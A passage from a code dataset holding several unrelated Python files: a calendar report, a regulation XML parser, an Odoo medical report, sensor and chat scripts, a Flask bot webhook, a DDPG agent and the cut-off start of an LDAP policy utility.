sched[h][m] = {}\n \n if query.open():\n for act in query:\n for person in self.Persons:\n if act.Users.find(person) >= 0:\n st = act.StartTime\n et = act.EndTime\n mn = st.minute\n if (mn % 10) > 0: mn = mn - (mn % 10)\n rows = int(((et.hour * 60 + et.minute) - (st.hour * 60 + st.minute)) / 10)\n sched[act.StartTime.hour][mn][person] = {\"internalId\": act.internalId, \"Comment\": act.Comment, \"Rows\": rows}\n query.close\n return sched\n \n def DisplayDailyCalendar(self):\n self.addHTML(\"
\")\n self.startTable(Border=\"2\")\n self.startHeaderRow()\n self.addValue(tr(\"Close\"), CallMethod=\"closeDay\")\n self.addValue(\"%i %s %s %s %i\" % (self.record.Date.day,tr(\"of\"), globals.MonthNames[self.record.Date.month],tr(\"of\"), self.record.Date.year), Width=\"50px\", ColSpan=len(self.Persons))\n self.endHeaderRow()\n self.startHeaderRow()\n self.addValue(tr(\"Hour\"))\n personsAvoidRow = {}\n for person in self.Persons:\n self.addValue(person, Width=\"50px\")\n personsAvoidRow[person] = 0\n self.endHeaderRow()\n\n sched = self.getPreparedDailySched()\n for h in range(8,20):\n self.startRow()\n self.addValue(\"%d:00\" % h, RowSpan=6)\n sr = False\n for m in range(0,60,10):\n pnr = 0\n if sr: self.startRow()\n sr = True\n for person in self.Persons:\n #self.addValue(personsAvoidRow[person])\n if personsAvoidRow[person] > 0:\n personsAvoidRow[person] = personsAvoidRow[person] - 1 \n elif sched[h][m].has_key(person):\n act = sched[h][m][person]\n self.addValue(act[\"Comment\"], CallMethod=\"openActivity\", Parameter=str(act[\"internalId\"]), RowSpan=act[\"Rows\"], BGColor=PersonBGColors[pnr], Width=\"50px\")\n personsAvoidRow[person] = act[\"Rows\"] - 1\n elif len(sched[h][m]):\n self.addValue(\"\", Border=0)\n pnr += 1\n self.endRow()\n \n self.endTable()\n self.startTable()\n self.startHeaderRow()\n self.addValue(tr(\"Previous\"), CallMethod=\"move\", Parameter=\"100\")\n self.addValue(tr(\"Next\"), CallMethod=\"move\", Parameter=\"101\")\n self.endHeaderRow()\n self.endTable()\n \n def loadMonthCalendar(self):\n \n query = Query()\n query.sql = \"SELECT {internalId}, {StartDate}, {EndDate} FROM [Activity]\"\n query.sql += \" WHERE?AND {EndDate} >= d|%s|\" % StartOfMonth(self.record.Date)\n query.sql += \" WHERE?AND {StartDate} <= d|%s|\" % EndOfMonth(self.record.Date)\n query.sql += \" WHERE?AND (\";\n OR = \"\"\n for person in self.Persons:\n query.sql += OR + \" {Users} LIKE s|%s|\" % (\"%\" + person + \"%\")\n OR = \"OR\"\n query.sql += \")\"; \n\n daysInMonth = monthrange(self.record.Date.year, self.record.Date.month)[1]\n self.monthCalendar.clear()\n if query.open():\n for rec in query:\n date = rec.StartDate\n for day in range(rec.StartDate.day, rec.EndDate.day+1):\n if day > daysInMonth: break\n if not self.monthCalendar.has_key(day):\n self.monthCalendar[day] = [rec.internalId]\n else:\n self.monthCalendar[day].append(rec.internalId)\n \n def openActivity(self, param, value):\n from Activity import Activity\n from ActivityWindow import ActivityWindow\n activity = Activity()\n activity.internalId = int(param)\n if (activity.load()):\n actwindow = ActivityWindow()\n actwindow.setRecord(activity)\n actwindow.open()\n \n def bringMonth(self, value):\n self.clear()\n self.ShowMonth = True\n self.run()\n self.render()\n \n def bringWeek(self, value):\n self.clear()\n self.record.Date = StartOfWeek(self.WeekNr[int(value)])\n self.ShowWeek = True\n self.run()\n self.render()\n \n def closeWeek(self, value):\n self.clear()\n self.ShowWeek = False\n self.run()\n self.render() \n \n def bringDay(self, value):\n self.clear()\n self.record.Date = datetime(self.record.Date.year, self.record.Date.month, int(value))\n self.ShowDay = True\n self.run()\n self.render()\n \n def closeDay(self, value):\n self.clear()\n self.ShowDay = False\n self.run()\n self.render() \n \n def move(self, param, value):\n self.clear()\n self.SchedLoaded = False\n if (param == \"000\"):\n self.record.Date = addMonths(self.record.Date, -1)\n elif (param == \"001\"):\n self.record.Date = addMonths(self.record.Date, 1)\n elif (param == \"010\"):\n self.record.Date = addDays(self.record.Date, -7)\n elif (param == \"011\"):\n self.record.Date = addDays(self.record.Date, 7)\n elif (param == \"100\"):\n self.record.Date = addDays(self.record.Date, -1)\n elif (param == \"101\"):\n self.record.Date = addDays(self.record.Date, 1)\n self.run()\n self.render()\n \n \n","sub_path":"standard/reports/ShowCalendar.py","file_name":"ShowCalendar.py","file_ext":"py","file_size_in_byte":12304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"501025520","text":"#vim: set encoding=utf-8\nimport re\nimport logging\n\nfrom lxml import etree\n\nfrom regparser import content\nfrom regparser.tree.struct import Node\nfrom regparser.tree.paragraph import p_level_of, p_levels\nfrom regparser.tree.xml_parser.appendices import build_non_reg_text\nfrom regparser.tree import reg_text\nfrom regparser.tree.xml_parser import tree_utils\n\n\ndef determine_level(c, current_level, next_marker=None):\n \"\"\" Regulation paragraphs are hierarchical. This determines which level\n the paragraph is at. Convert between p_level indexing and depth here by\n adding one\"\"\"\n potential = p_level_of(c)\n\n if len(potential) > 1 and next_marker: # resolve ambiguity\n following = p_level_of(next_marker)\n\n # Add character index\n potential = [(level, p_levels[level].index(c)) for level in potential]\n following = [(level, p_levels[level].index(next_marker))\n for level in following]\n\n # Check if we can be certain using the following marker\n for pot_level, pot_idx in potential:\n for next_level, next_idx in following:\n if ( # E.g. i followed by A or i followed by 1\n (next_idx == 0 and next_level == pot_level + 1)\n or # E.g. i followed by ii\n (next_level == pot_level and next_idx > pot_idx)\n or # E.g. i followed by 3\n (next_level < pot_level and next_idx > 0)):\n return pot_level + 1\n logging.warning(\"Ambiguous marker (%s) not followed by something \"\n + \"disambiguating (%s)\", c, next_marker)\n return potential[0][0] + 1\n\n else:\n return potential[0] + 1\n\n\ndef get_reg_part(reg_doc):\n \"\"\"\n The CFR Part number for a regulation is contained within\n an EAR tag, for a Federal Register notice it's in a REGTEXT tag. Get the\n part number of the regulation.\n \"\"\"\n\n #FR notice\n reg_text_xml = reg_doc.xpath('//REGTEXT')\n if reg_text_xml:\n return reg_text_xml[0].attrib['PART']\n\n #e-CFR XML\n reg_ear = reg_doc.xpath('//PART/EAR')\n if reg_ear:\n return reg_ear[0].text.split('Pt.')[1].strip()\n\n\ndef get_title(reg_doc):\n \"\"\" Extract the title of the regulation. \"\"\"\n parent = reg_doc.xpath('//PART/HD')[0]\n title = parent.text\n return title\n\n\ndef preprocess_xml(xml):\n \"\"\"This transforms the read XML through macros. Each macro consists of\n an xpath and a replacement xml string\"\"\"\n for path, replacement in content.Macros():\n replacement = etree.fromstring('' + replacement + '')\n for node in xml.xpath(path):\n parent = node.getparent()\n idx = parent.index(node)\n parent.remove(node)\n for repl in replacement:\n parent.insert(idx, repl)\n idx += 1\n\n\ndef build_tree(reg_xml):\n doc = etree.fromstring(reg_xml)\n preprocess_xml(doc)\n\n reg_part = get_reg_part(doc)\n title = get_title(doc)\n\n tree = Node(\"\", [], [reg_part], title)\n\n part = doc.xpath('//PART')[0]\n\n subpart_xmls = [c for c in part.getchildren() if c.tag == 'SUBPART']\n if len(subpart_xmls) > 0:\n subparts = [build_subpart(reg_part, s) for s in subpart_xmls]\n tree.children = subparts\n else:\n section_xmls = [c for c in part.getchildren() if c.tag == 'SECTION']\n sections = []\n for section_xml in section_xmls:\n sections.extend(build_from_section(reg_part, section_xml))\n empty_part = reg_text.build_empty_part(reg_part)\n empty_part.children = sections\n tree.children = [empty_part]\n\n non_reg_sections = build_non_reg_text(doc, reg_part)\n tree.children += non_reg_sections\n\n return tree\n\n\ndef get_subpart_title(subpart_xml):\n hds = subpart_xml.xpath('./HD')\n return [hd.text for hd in hds][0]\n\n\ndef build_subpart(reg_part, subpart_xml):\n subpart_title = get_subpart_title(subpart_xml)\n subpart = reg_text.build_subpart(subpart_title, reg_part)\n\n sections = []\n for ch in subpart_xml.getchildren():\n if ch.tag == 'SECTION':\n sections.extend(build_from_section(reg_part, ch))\n\n subpart.children = sections\n return subpart\n\n\ndef get_markers(text):\n \"\"\" Extract all the paragraph markers from text. Do some checks on the\n collapsed markers.\"\"\"\n markers = tree_utils.get_paragraph_markers(text)\n collapsed_markers = tree_utils.get_collapsed_markers(text)\n\n # Check that the collapsed markers make sense (i.e. are at least one\n # level below the initial marker)\n if markers and collapsed_markers:\n initial_marker_levels = p_level_of(markers[-1])\n final_collapsed_markers = []\n for collapsed_marker in collapsed_markers:\n collapsed_marker_levels = p_level_of(collapsed_marker)\n if any(c > f for f in initial_marker_levels\n for c in collapsed_marker_levels):\n final_collapsed_markers.append(collapsed_marker)\n collapsed_markers = final_collapsed_markers\n markers_list = [m for m in markers] + [m for m in collapsed_markers]\n\n return markers_list\n\n\ndef get_markers_and_text(node, markers_list):\n node_text = tree_utils.get_node_text(node, add_spaces=True)\n text_with_tags = tree_utils.get_node_text_tags_preserved(node)\n\n if len(markers_list) > 1:\n actual_markers = ['(%s)' % m for m in markers_list]\n plain_markers = [m.replace('', '').replace('', '')\n for m in actual_markers]\n node_texts = tree_utils.split_text(node_text, plain_markers)\n tagged_texts = tree_utils.split_text(text_with_tags, actual_markers)\n node_text_list = zip(node_texts, tagged_texts)\n elif markers_list:\n node_text_list = [(node_text, text_with_tags)]\n return zip(markers_list, node_text_list)\n\n\ndef next_marker(xml_node, remaining_markers):\n \"\"\"Try to determine the marker following the current xml_node. Remaining\n markers is a list of other marks *within* the xml_node. May return\n None\"\"\"\n # More markers in this xml node\n if remaining_markers:\n return remaining_markers[0][0]\n\n # Check the next xml node; skip over stars\n sib = xml_node.getnext()\n while sib is not None and sib.tag in ('STARS', 'PRTPAGE'):\n sib = sib.getnext()\n if sib is not None:\n next_text = tree_utils.get_node_text(sib)\n next_markers = get_markers(next_text)\n if next_markers:\n return next_markers[0]\n\n\ndef build_from_section(reg_part, section_xml):\n p_level = 1\n m_stack = tree_utils.NodeStack()\n section_texts = []\n for ch in (ch for ch in section_xml.getchildren() if ch.tag == 'P'):\n text = tree_utils.get_node_text(ch, add_spaces=True)\n tagged_text = tree_utils.get_node_text_tags_preserved(ch)\n markers_list = get_markers(tagged_text)\n\n if not markers_list:\n section_texts.append((text, tagged_text))\n else:\n markers_and_text = get_markers_and_text(ch, markers_list)\n\n # Easier to reason if we view the list as a stack\n markers_and_text = list(reversed(markers_and_text))\n while markers_and_text:\n m, node_text = markers_and_text.pop()\n m_sans_markup = m.replace('', '').replace('', '')\n n = Node(node_text[0], [], [str(m_sans_markup)],\n source_xml=ch)\n n.tagged_text = unicode(node_text[1])\n\n new_p_level = determine_level(\n m, p_level, next_marker(ch, markers_and_text))\n\n last = m_stack.peek()\n if len(last) == 0:\n m_stack.push_last((new_p_level, n))\n else:\n m_stack.add(new_p_level, n)\n p_level = new_p_level\n\n section_no = section_xml.xpath('SECTNO')[0].text\n subject_xml = section_xml.xpath('SUBJECT')\n if not subject_xml:\n subject_xml = section_xml.xpath('RESERVED')\n subject_text = subject_xml[0].text\n\n nodes = []\n section_nums = []\n for match in re.finditer(r'%s\\.(\\d+)' % reg_part, section_no):\n section_nums.append(int(match.group(1)))\n\n # Span of section numbers\n if u'§§' == section_no[:2] and '-' in section_no:\n first, last = section_nums\n section_nums = []\n for i in range(first, last + 1):\n section_nums.append(i)\n\n for section_number in section_nums:\n section_number = str(section_number)\n plain_sect_texts = [s[0] for s in section_texts]\n tagged_sect_texts = [s[1] for s in section_texts]\n\n section_text = ' '.join([section_xml.text] + plain_sect_texts)\n tagged_section_text = ' '.join([section_xml.text] + tagged_sect_texts)\n section_title = u\"§ \" + reg_part + \".\" + section_number\n if subject_text:\n section_title += \" \" + subject_text\n\n sect_node = Node(\n section_text, label=[reg_part, section_number],\n title=section_title)\n sect_node.tagged_text = tagged_section_text\n\n m_stack.add_to_bottom((1, sect_node))\n\n while m_stack.size() > 1:\n m_stack.unwind()\n\n nodes.append(m_stack.pop()[0][1])\n\n return nodes\n","sub_path":"regparser/tree/xml_parser/reg_text.py","file_name":"reg_text.py","file_ext":"py","file_size_in_byte":9371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"254134765","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api, _\n\n\nclass PatientEvaluation(models.AbstractModel):\n _name = 'report.medical_history.patient_evaluation'\n\n def get_marital_status(self, ids):\n this = self.env[\"medical.patient\"].search([('id', '=', ids)])\n for record in this:\n if record.marital_status == 's':\n aux = 'Single'\n elif record.marital_status == 'm':\n aux = 'Married'\n elif record.marital_status == 'w':\n aux = 'Widow(er)'\n elif record.marital_status == 'd':\n aux = 'Divorced'\n else:\n aux = 'Separated'\n return aux\n\n def get_loc_eyes(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.loc_eyes == '1':\n aux = 'Does not Open Eyes'\n elif record.loc_eyes == '2':\n aux = 'Opens eyes in response to painful stimuli'\n elif record.loc_eyes == '3':\n aux = 'Opens eyes in response to voice'\n else:\n aux = 'Opens eyes spontaneously'\n return aux\n\n def get_loc_verbal(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.loc_verbal == '1':\n aux = 'Makes no sounds'\n elif record.loc_verbal == '2':\n aux = 'Incomprehensible sounds'\n elif record.loc_verbal == '3':\n aux = 'Utters inappropriate words'\n elif record.loc_verbal == '4':\n aux = 'Confused, disoriented'\n else:\n aux = 'Oriented, converses normally'\n return aux\n\n def get_loc_motor(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.loc_motor == '1':\n aux = 'Makes no movement'\n elif record.loc_motor == '2':\n aux = 'Extension to painful stimuli - decerebrate response -'\n elif record.loc_motor == '3':\n aux = 'Abnormal flexion to painful stimuli (decorticate response)'\n elif record.loc_motor == '4':\n aux = 'Flexion / Withdrawal to painful stimuli'\n elif record.loc_motor == '5':\n aux = 'Localizes painful stimuli'\n else:\n aux = 'Obeys commands'\n return aux\n\n def get_discharge_reason(self, ids):\n this = self.env[\"medical.patient.evaluation\"].search([('id', '=', ids)])\n for record in this:\n if record.discharge_reason == 'home':\n aux = 'Home / Selfcare'\n elif record.discharge_reason == 'transfer':\n aux = 'Transferred to another institution'\n else:\n aux = 'Death'\n return aux\n\n def get_xory(self, ids):\n this = self.env[\"medical.patient.family.diseases\"].search([('patient', '=', ids)])\n for record in this:\n if record.xory == 'm':\n aux = 'Maternal'\n elif record.xory == 'f':\n aux = 'Paternal'\n elif record.xory == 's':\n aux = 'Sibling'\n else:\n aux = ''\n return aux\n\n def get_relative(self, ids):\n this = self.env[\"medical.patient.family.diseases\"].search([('patient', '=', ids)])\n for record in this:\n if record.relative == 'mother':\n aux = 'Mother'\n elif record.relative == 'father':\n aux = 'Father'\n elif record.relative == 'brother':\n aux = 'Brother'\n elif record.relative == 'sister':\n aux = 'Sister'\n elif record.relative == 'aunt':\n aux = 'Aunt'\n elif record.relative == 'uncle':\n aux = 'Uncle'\n elif record.relative == 'nephew':\n aux = 'Nephew'\n elif record.relative == 'niece':\n aux = 'Niece'\n elif record.relative == 'grandfather':\n aux = 'Grandfather'\n elif record.relative == 'grandmother':\n aux = 'Grandmother'\n else:\n aux = 'Cousin'\n return aux\n\n def get_sexual_preferences(self, ids):\n this = self.env[\"medical.patient\"].search([('id', '=', ids)])\n for record in this:\n if record.sexual_preferences == 'h':\n aux = 'Heterosexual'\n elif record.sexual_preferences == 'g':\n aux = 'Homosexual'\n elif record.sexual_preferences == 'b':\n aux = 'Bisexual'\n else:\n aux = 'Transexual'\n return aux\n\n @api.model\n def _get_report_values(self, docids, data=None):\n patient = self.env['medical.patient.evaluation'].browse(docids)\n return {\n 'doc_ids': docids,\n 'doc_model': 'medical.patient.evaluation',\n 'docs': patient,\n 'data': data,\n 'marital_status': self.get_marital_status,\n 'loc_eyes': self.get_loc_eyes,\n 'loc_verbal': self.get_loc_verbal,\n 'loc_motor': self.get_loc_motor,\n 'discharge_reason': self.get_discharge_reason,\n 'xory': self.get_xory,\n 'relative': self.get_relative,\n 'sexual_preferences': self.get_sexual_preferences,\n\n }\n","sub_path":"medical_history/reports/patient_evaluation_report.py","file_name":"patient_evaluation_report.py","file_ext":"py","file_size_in_byte":5614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"14242556","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport sys\nimport dhtreader\n\nDHT11 = 11\nDHT22 = 22\nAM2302 = 22\n\n\ndhtreader.init()\n\nt, h = dhtreader.read(22, 4)\nif t and h:\n print(\"Temp = {0} *C, Hum = {1} %\".format(t, h))\nelse:\n print(\"Failed to read from sensor, maybe try again?\")\n","sub_path":"Adafruit_DHT_Driver_Python/build/lib.linux-armv6l-2.7/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"499651116","text":"import subprocess\nfrom copy import deepcopy\n\ndef self_play(player1,player2):\n # run the program with the two players \n stdoutdata = subprocess.check_output(['python','referee.py',player1,player2])\n \n # return the processed data as a tuple containing a list of dictionaries and the result\n return process_game(stdoutdata.decode(\"utf-8\"))\n \ndef process_game(game):\n '''\n Returns the result of a game as a list of dictionaries\n and the result\n '''\n \n lines = game.splitlines()\n \n current_board_line = 0\n game_over = False\n \n states = []\n state = []\n \n for i in range(4,len(lines)): \n \n if \"game over!\" in lines[i]:\n game_over = True\n continue\n \n if game_over:\n winner = lines[i][8]\n break\n \n if current_board_line == 8:\n current_board_line = 0\n states.append(state)\n state = deepcopy(state)\n state = []\n continue\n \n state.append(lines[i].split())\n current_board_line += 1\n \n dict_states = []\n for state in states:\n state_dict = {(x,y):state[y][x] for x in range(8) for y in range(8)}\n dict_states.append(state_dict)\n return dict_states, winner\n \n ","sub_path":"selfplay.py","file_name":"selfplay.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"319000022","text":"from . update_inventory_item_field import UpdateInventoryItemField\n\n\nclass UpdateBarcode(UpdateInventoryItemField):\n field_name = 'Barcode'\n\n def __init__(self, api_session, value=None, stock_id=None):\n if value is not None:\n self.value = value\n if stock_id is not None:\n self.stock_id = stock_id\n super().__init__(api_session)\n\n def test_request(self):\n assert isinstance(self.value, str), \"Value must be of type str\"\n return super().test_request(self)\n","sub_path":"pylinnworks/api_requests/inventory/update_inventory/update_barcode.py","file_name":"update_barcode.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"51695826","text":"from Tkinter import *\ndef main():\n\timport sys\n\tlength=3\n\n\t#switch_details={'interface_name':[\"\"]*length,\n\t# \t\t\t'avail_out_interfaces':[0]*length,\n\t# \t\t\t'subnet_IP_addr':[0]*length,\n\t# \t\t\t'delay':[0]*length}\n\n\tswitch_details={'interface_name':[\"Int#1\",\"Int#2\",\"Int#3\"],\n \t\t\t\t'avail_out_interfaces':[5,2,10],\n \t\t\t\t'subnet_IP_addr':[\"172.16.68\",\"172.16.68\",\"172.16.68\"],\n \t\t\t\t'delay':[50,25,75]}\n\n\n\t#for i in range(3):\n\t#\tswitch_details['interface_name'][i]=raw_input(\"Enter interface name : \")\n\t#\tswitch_details['avail_out_interfaces'][i]=input(\"Enter available no. of output interfaces : \")\n\t#\tswitch_details['subnet_IP_addr'][i]=raw_input(\"Enter subnet IP : \")\n\t#\tswitch_details['delay'][i]=input(\"Enter Delay per interface : \")\n\n\n\t#for i in range(3):\n\t#\tprint \\\n\t#\tswitch_details['interface_name'][i],\" | \",\\\n\t#\tswitch_details['avail_out_interfaces'][i],\" | \",\\\n\t#\tswitch_details['subnet_IP_addr'][i],\" | \",\\\n\t#\tswitch_details['delay'][i]\n\n\t# sys.stdout.softspace=0 #To stop python from inserting spaces between two things in one print statement\n\t#from __future__ import print_function\n\t#print('h',end='') # To stop python from inserting newline character at the end of line\n\t#print('h','m','h',sep='') #To stop python from inserting spaces between two things in one print statement\n\n\t#for i in range(3):\n\t#\tsys.stdout.write(switch_details['subnet_IP_addr'][i]+\".\"+str(i)+\"\\n\")\n\t\t# sys.stdout.write can only print string. So, we have to convert i to string by str(i)\n\n\tinput_interface_name = str(interface_name.get())\n\tinput_output_interfaces = int(in_out_interfaces.get())\n\n\tfob = open('fri_3_5_even.txt','w')\n\n\tfor i in range(3):\n\t\tif(switch_details['interface_name'][i] == input_interface_name):\n\t\t\tif(input_output_interfaces<=switch_details['avail_out_interfaces'][i]):\n\t\t\t\tif(((switch_details['delay'][i])*(input_output_interfaces))<=300):\n\t\t\t\t\tfob.write(\"Interface Name : \"+input_interface_name+\"\\n\")\n\t\t\t\t\tfob.write(\"Number of requested output interfaces : \"+str(input_output_interfaces)+\"\\n\")\n\t\t\t\t\tfob.write(\"Estimated Delay : \"+str((switch_details['delay'][i])*(input_output_interfaces))+\"\\n\")\n\t\t\t\t\tfob.write(\"Assigned IP Address : \"+\"\\n\")\n\t\t\t\t\tfor j in range(input_output_interfaces):\n\t\t\t\t\t\tfob.write(switch_details['subnet_IP_addr'][i]+\".\"+str(j+1)+\"\\n\")\n\t\t\t\telse:\n\t\t\t\t\tfob.write(\"Error\")\n\tfob.close()\n\tfob = open('fri_3_5_even.txt','r')\n\ttextField.delete(0.0,END)\n\ttextField.insert(INSERT,fob.read())\n\tfob.close()\n\n\nif __name__ == '__main__' :\n\troot = Tk()\n\tLabel(root,text=\"Interface Name :\").grid(row=0)\n\tLabel(root,text = \"No of output Interfaces :\").grid(row=1)\n\n\tinterface_name = StringVar()\n\tentry_interface = Entry(root, textvariable = interface_name)\n\tentry_interface.grid(row=0, column=1)\n\n\tin_out_interfaces = StringVar()\n\tentry_no_interface = Entry(root, textvariable = in_out_interfaces)\n\tentry_no_interface.grid(row=1, column=1)\n\tok_button = Button(root,text=\"OK\", command=lambda :main())\n\tok_button.grid(row=4,column=0,rowspan=2,columnspan=2)\n\n\ttextField = Text(root)\n\ttextField.grid(row =6,columnspan=4)\n\troot.mainloop()\n\t\n","sub_path":"fri_3_5_even_odd_combined.py","file_name":"fri_3_5_even_odd_combined.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"296534090","text":"#client\nimport socket,sys,threading\nfrom select import select\nfrom setting import *\nimport random\n\n\ndef connect(s_cli,p_serv):\n rlst = [s_cli,p_serv]\n wlst = []\n \n while True:\n rd, wd, ex = select(rlst, wlst, rlst)\n for r in rd:\n if r is s_cli:\n try:\n data = r.recv(1024)\n print(data.decode('utf-8'))\n except Exception:\n continue\n \n else:\n conn, addr = r.accept()\n data = conn.recv(1024)\n s_cli.send(data)\n conn.close()\n\nif __name__ == \"__main__\":\n name=input(\"input your nickname: \")\n s_cli = sock_cli(SOCK_SERV)\n s_cli.send(bytes('{} connection...'.format(name),'utf-8'))\n \n while True:\n PORT = random.randint(5000, 10000)\n if PORT not in PORTS:break\n P_ADDR=('127.0.0.1',PORT)\n p_serv = sock_serv(P_ADDR)\n\n t = threading.Thread(target=connect, args=(s_cli,p_serv))\n t.setDaemon(True)\n t.start()\n\n while True:\n try:\n \n data =input()\n \n except KeyboardInterrupt:\n s_cli.close()\n p_serv.close()\n break\n if not data:\n break\n else:\n p_cli = sock_cli(P_ADDR)\n p_cli.send(bytes(name+' : '+data, 'utf-8'))\n p_cli.close()","sub_path":"chat/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"92126038","text":"import flask\nimport vk_io.settings\nimport system.main_handler\nimport git\nimport telegram_io.telegram_api\n\nsecret = \"\"\napp = flask.Flask(__name__)\ntelegram_io.telegram_api.set_webhook(secret)\n\n\n@app.route('/{}'.format(secret), methods=['POST'])\ndef processing():\n data = flask.json.loads(flask.request.data)\n system.main_handler.load_api(check_source(data), data)\n if 'type' in data.keys() and data['type'] == 'confirmation':\n return vk_io.settings.confirmation_token\n else:\n system.main_handler.build(data)\n return 'ok'\n\n\n@app.route('/{}_webhook'.format(secret), methods=['POST'])\ndef webhook():\n repo = git.Repo('/home/milty/POEbot')\n origin = repo.remotes.origin\n repo.create_head('master', origin.refs.master).set_tracking_branch(origin.refs.master).checkout()\n origin.pull()\n return '', 200\n\n\ndef check_source(message):\n if 'object' in message.keys():\n return 1\n elif 'message' in message.keys():\n return 2\n else:\n return 0\n","sub_path":"flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"125605523","text":"from model import Actor, Critic\nfrom ragdoll import ragdoll\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport torch.optim as optim\nfrom replayBuffer import ReplayBuffer\nfrom OUNoise import OUNoise\n\ndevice = torch.device(\"cuda:0\")\n# device = torch.device(\"cpu\")\n\n\nLR_ACTOR = 0.0001# 0.0001\nLR_CRITIC = 0.001 #0.001\nWEIGHT_DECAY = 0.001\nBUFFER_SIZE = 100000 #1000000\nBATCH_SIZE = 20 # was 10, tried 100 -> very slow on cpu\ndiscount_factor = 0.99\nTAU = 0.001\n\nclass Agent():\n\n\tdef __init__(self, state_size, action_size):\n\n\t\tself.state_size = state_size\n\t\tself.action_size = action_size\n\n\t\t#init actor\n\t\tself.actor = Actor(state_size,action_size).to(device)\n\t\tself.actor_target = Actor(state_size,action_size).to(device)\n\t\tself.actor_optimizer = optim.Adam(self.actor.parameters(), lr = LR_ACTOR)\n\t\t#init critic\n\t\tself.critic = Critic(state_size,action_size).to(device)\n\t\tself.critic_target = Critic(state_size,action_size).to(device)\n\t\tself.critic_optimizer = optim.Adam(self.critic.parameters(), lr = LR_CRITIC, weight_decay = WEIGHT_DECAY)\n\n\t\tself.memory = ReplayBuffer(action_size, BUFFER_SIZE, BATCH_SIZE)\n\n\t\tself.noise = OUNoise(action_size)\n\n\t\tself.aLossOut = 0\n\t\tself.cLossOut = 0\n\n\tdef step(self, state, action,reward,next_state,done, is_learning = True):\n\t\t\"\"\"save experience to memory buffer\"\"\"\n\t\tself.memory.add(state,action,reward,next_state,done)\n\n\t\t#sample (returns numpy array)\n\t\tif len(self.memory) > BATCH_SIZE and is_learning == True:\n\t\t\texperiences = self.memory.sample()\n\t\t\tself.learn(experiences, discount_factor)\n\n\tdef learn(self, experiences, discount_factor):\n\t\tstates, actions, rewards, next_states, dones = experiences\n\n\t\t#update critic\n\t\tQvals = self.critic.forward(states,actions)\n\t\tnext_actions = self.actor_target.forward(next_states)\n\t\tnext_Q = self.critic_target.forward(next_states, next_actions)\n\t\tQprime = rewards + discount_factor*next_Q*(1-dones) #ignores result of samples that are at the end\n\n\t\tcloss = nn.SmoothL1Loss()\n\t\t# closs = nn.MSELoss() - error too large, this explodes\n\t\tcritic_loss = closs(Qvals,Qprime)\n\t\tself.cLossOut = critic_loss.cpu().detach().numpy()\n\t\tself.critic_optimizer.zero_grad()\n\t\tcritic_loss.backward()\n\t\tself.critic_optimizer.step()\n\n\t\t# Compute actor loss\n\t\tactions_pred = self.actor(states)\n\t\tactor_loss = -self.critic(states, actions_pred).mean()\n\t\tself.aLossOut = actor_loss.cpu().detach().numpy()\n\n\t\t# Minimize the loss\n\t\tself.actor_optimizer.zero_grad()\n\t\tactor_loss.backward()\n\t\tself.actor_optimizer.step()\n\n\t\tself.soft_update(self.critic, self.critic_target, TAU)\n\t\tself.soft_update(self.actor, self.actor_target, TAU) \n\n\tdef soft_update(self, local_model, target_model, tau):\n\t\t\"\"\"θ_target = τ*θ_local + (1 - τ)*θ_target\"\"\"\n\t\tfor target_param, local_param in zip(target_model.parameters(), local_model.parameters()):\n\t\t\ttarget_param.data.copy_(tau*local_param.data + (1.0-tau)*target_param.data)\n","sub_path":"HW3/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"216061145","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n Ajan utils.\n\"\"\"\n\nimport hashlib\nimport ldap\nimport ldif\nimport logging\nimport os\nimport time\nimport StringIO\n\n\ndef get_ldif(value):\n \"\"\"\n Converts a policy object to LDIF string.\n\n Args:\n value: Policy setting object\n Returns: LDIF string\n \"\"\"\n output = StringIO.StringIO()\n writer = ldif.LDIFWriter(output)\n try:\n writer.unparse(value[0], value[1])\n text = output.getvalue()\n except (KeyError, TypeError):\n return ''\n output.close()\n return text\n\ndef load_ldif(filename):\n \"\"\"\n Reads an LDIF file and returns as a policy object.\n\n Args:\n filename: File that contains LDIF\n Returns:\n Policy object\n \"\"\"\n class MyLDIF(ldif.LDIFParser):\n \"\"\"Custom LDIF Parser\"\"\"\n def handle(self, dn, entry):\n \"\"\"LDIF Handler\"\"\"\n if self.comp:\n self.ou.append(entry)\n else:\n self.comp = entry\n\n try:\n parser = MyLDIF(file(filename))\n except (KeyError, TypeError):\n return None\n parser.comp = None\n parser.ou = []\n parser.parse()\n return parser.comp\n\ndef fetch_policy(conn, options, domain, pattern):\n \"\"\"\n Fetches a policy if necessary.\n\n Args:\n conn: LDAP connection object\n options: Options\n domain: Domain name\n pattern: Search pattern\n Returns:\n True or False\n \"\"\"\n policy_file = os.path.join(options.policydir, \"policy_\" + options.username)\n timestamp_file = policy_file + '.ts'\n timestamp_old = ''\n update_required = False\n\n if 